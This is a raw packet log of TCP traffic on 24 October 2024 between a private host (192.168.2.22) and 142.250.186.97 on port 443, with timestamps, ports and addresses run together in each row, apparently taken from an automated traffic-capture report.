                                                                                              Oct 24, 2024 08:40:13.113641024 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.113655090 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.113662958 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.113725901 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.114185095 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.118463993 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.118594885 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.118650913 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.118658066 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.118665934 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.118705988 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.123594046 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.126696110 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.126739025 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.127146959 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.127159119 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.129914999 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.129947901 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.130008936 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.130012035 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.130018950 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.130028963 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.130074024 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.135584116 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.135637045 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.135957003 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.135977983 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.138690948 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.138746977 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.138763905 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.138776064 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.138792038 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.138825893 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.138834953 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.144433022 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.144607067 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.144617081 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.150757074 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.151043892 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.151053905 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.155977011 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.156451941 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.156471014 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.164020061 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.472460985 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.472489119 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.472526073 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.472528934 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.472528934 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.472536087 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.472578049 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.472645998 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.472760916 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.472785950 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.472825050 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.472832918 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.472875118 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.472909927 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.472917080 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.472971916 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.473128080 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.473177910 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.473262072 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.473268986 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.473349094 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.473421097 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.473428011 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.475636005 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.475754023 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.475761890 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.477718115 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.477798939 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.477807045 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.481489897 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.481570959 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.481581926 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.485163927 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.485239983 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.485248089 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.491734028 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.491766930 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.491813898 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.491849899 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.491853952 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.491864920 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.491888046 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.491916895 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.491921902 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.491931915 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.492151022 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.492157936 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.493632078 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.493660927 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.493729115 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.493753910 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.493778944 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.493788004 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.493793964 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.496575117 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.496684074 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.496701002 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.502377033 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.502492905 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.502506018 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.508555889 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.508588076 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.508616924 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.508647919 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.508662939 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.508672953 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.513741970 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.513854980 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.513884068 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.522162914 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.522272110 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.522284031 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.525495052 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.525553942 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.525567055 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.531543970 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.531569004 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.531589985 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.531624079 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.531624079 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.531641006 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.531677961 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.531677961 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.559407949 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.559461117 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.559509039 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.559520006 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.559792995 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.559828043 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.591403961 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.591437101 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.591456890 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.591547966 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.591548920 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.591579914 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.591618061 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.591619968 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.591690063 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.591705084 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.591722965 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.591772079 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.591814041 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.591866016 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.591913939 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.591928005 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.591938972 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.591995955 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.592228889 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.592281103 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.592308998 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.592334986 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.592349052 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.592355967 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.592361927 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.592379093 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.592398882 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.592411041 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.592652082 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.592710018 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.592720985 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.592756987 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.592792034 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.592797041 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.592817068 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.592822075 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.592879057 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.592900991 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.592912912 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.593102932 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.595109940 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.597023964 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.597063065 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.597089052 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.597115993 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.597189903 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.600614071 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.604850054 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.604870081 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.604911089 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.604931116 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.605005980 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.611001015 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.611078978 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.611112118 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.611222982 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.611253977 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.611262083 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.611268997 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.611304998 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.611304998 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.611371994 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.613159895 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.613188028 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.613205910 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.613218069 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.613245964 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.613265038 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.613272905 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.613338947 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.615803003 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.621643066 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.621666908 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.621751070 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.621766090 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.627958059 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.627990007 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.628027916 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.628032923 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.854661942 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.854671001 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.854743958 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.860317945 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.860373020 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.860382080 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.866791010 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.866830111 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.866895914 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.866919994 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.866928101 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.867065907 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.872056007 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.880609035 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.880645990 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.880723953 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.880738020 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.883774996 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.883825064 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.883833885 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.889591932 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.889630079 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.889728069 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.889743090 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.889755964 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.889795065 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.917675972 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.917756081 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.917795897 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.917823076 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.917833090 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.917843103 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.917916059 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.917927027 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.917936087 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.918128967 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.918138027 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.949748039 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.949810028 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.949855089 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.949877024 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.949892998 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.949923038 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.949933052 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.949969053 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.950006962 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.950021982 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.950030088 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.950089931 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.950108051 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.950114012 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.950123072 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.950159073 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.950695992 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.950726986 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.950759888 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.950769901 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.950783968 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.950814962 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.958771944 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.958805084 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.958893061 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.958893061 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.958904982 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.969213009 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.969245911 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.969280005 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.969300032 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.969305038 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.969336033 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.974334955 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.974358082 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.974441051 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.974441051 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.974451065 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.974487066 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:13.999818087 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:13.999850035 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.000006914 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.000020027 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.000040054 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.037384033 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.037425041 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.037507057 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.037533045 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.037543058 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.037543058 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.069230080 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.069277048 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.069336891 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.069390059 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.069402933 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.069402933 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.069858074 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.069889069 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.069916010 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.069931984 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.069941998 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.069967985 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.069967985 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.069981098 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.070380926 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.070414066 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.070451021 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.070451021 CEST49174443192.168.2.22142.250.186.97
                                                                                              Oct 24, 2024 08:40:14.070460081 CEST44349174142.250.186.97192.168.2.22
                                                                                              Oct 24, 2024 08:40:14.070478916 CEST49174443192.168.2.22142.250.186.97
